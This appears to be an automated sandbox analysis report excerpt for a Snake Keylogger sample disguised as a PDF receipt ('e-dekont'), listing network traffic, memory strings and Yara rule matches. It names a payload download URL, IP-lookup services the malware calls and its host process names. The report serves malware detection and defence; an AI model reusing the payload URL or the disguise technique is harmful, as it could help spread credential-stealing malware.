              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49725 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /slim/Tvifaznhqk.mp4 HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /slim/Tvifaznhqk.mp4 HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: www.oleonidas.gr
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: InstallUtil.exe, 00000002.00000002.4478272423.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: InstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000342A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: InstallUtil.exe, 00000002.00000002.4478272423.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: TypeName.exe.0.drString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
              Source: InstallUtil.exe, 00000002.00000002.4478272423.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033FF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.0000000003051000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: InstallUtil.exe, 00000002.00000002.4478272423.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000342A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/66.23.206.109
              Source: InstallUtil.exe, 00000002.00000002.4478272423.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000342A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/66.23.206.109$
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr/slim/Tvifaznhqk.mp4
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49719 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000006.00000002.4475386970.0000000000416000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
